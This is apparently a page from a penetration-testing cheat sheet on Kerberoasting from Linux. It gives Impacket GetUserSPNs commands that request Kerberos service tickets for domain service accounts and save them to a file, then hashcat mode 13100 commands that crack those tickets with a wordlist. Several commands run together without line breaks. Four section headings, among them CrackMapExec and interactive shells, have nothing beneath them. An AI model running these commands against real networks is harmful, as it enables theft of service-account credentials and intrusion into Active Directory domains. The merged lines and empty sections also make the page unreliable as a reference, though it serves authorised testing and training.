14.Kerberoasting - from Linux
sudo python3 -m pip install . # Installs Impacket from the current directory
sudo pip3 install impacket # Alternative, if available from pip repositoriesGetUserSPNs.py -h # Displays help optionsGetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> # Replace <DC_IP>, <DOMAIN>, and <USER> with actual values. Prompts for password.GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -requestGetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request-user <TARGET_USER>GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request-user <TARGET_USER> -outputfile <OUTPUT_FILE> # Replace <OUTPUT_FILE> with the desired filename.Hashcat (Linux):
hashcat -m 13100 <TGS_FILE> <WORDLIST> # Replace <TGS_FILE> with the ticket file and <WORDLIST> with the wordlist path.hashcat -m 13100 <TGS_FILE> <WORDLIST> --force # Adds the --force option, useful when hashcat detects potential errors with the hash.hashcat -m 13100 <TGS_FILE> <WORDLIST> -o <CRACKED_FILE> # Adds the -o option to output the cracked password to a file.CrackMapExec (Linux):
Verification of Extracted Hashes:
Interactive Shell Variants:
Alternative Tools for SPN Enumeration:
Last updated